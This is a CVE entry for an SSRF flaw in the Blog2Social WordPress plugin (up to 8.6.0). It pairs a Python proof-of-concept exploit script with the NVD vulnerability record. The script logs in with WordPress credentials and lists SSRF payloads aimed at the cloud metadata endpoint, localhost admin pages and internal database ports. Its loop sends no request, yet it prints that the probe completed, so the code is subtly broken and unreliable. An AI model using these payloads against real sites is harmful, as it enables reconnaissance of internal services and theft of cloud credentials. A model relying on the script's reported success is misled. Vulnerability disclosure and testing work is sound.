CVE-2025-12560

# CVE-2025-12560 Blog2Social SSRF PoC # Target: WordPress site with Blog2Social <= 8.6.0 # Authentication: Subscriber-level or higher required import requests import sys def exploit_ssrf(target_url, wp_username, wp_password): """ Exploit SSRF in Blog2Social plugin via getFullContent() function """ # Login to WordPress session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { 'log': wp_username, 'pwd': wp_password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/" } response = session.post(login_url, data=login_data, allow_redirects=False) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful") # SSRF attack - probe internal metadata service ssrf_payloads = [ "http://169.254.169.254/latest/meta-data/", "http://127.0.0.1:8080/admin/", "http://192.168.1.1:80/", "http://localhost:3306/", "http://internal-db.local:5432/" ] # Trigger SSRF via getFullContent() function # This would typically be done via plugin's social posting feature for payload in ssrf_payloads: print(f"[*] Testing SSRF target: {payload}") # The actual exploitation depends on specific plugin endpoint # Consult the full advisory for exact request format print("[+] SSRF probe completed") return True if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_ssrf(target, user, pwd)

{"cve": {"id": "CVE-2025-12560", "sourceIdentifier": "[email protected]", "published": "2025-11-06T06:15:44.340", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 8.6.0 via the getFullContent() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3389636/blog2social", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2ea06520-d7a9-49bb-812e-2fa2e50d0ec2?source=cve", "source": "[email protected]"}]}}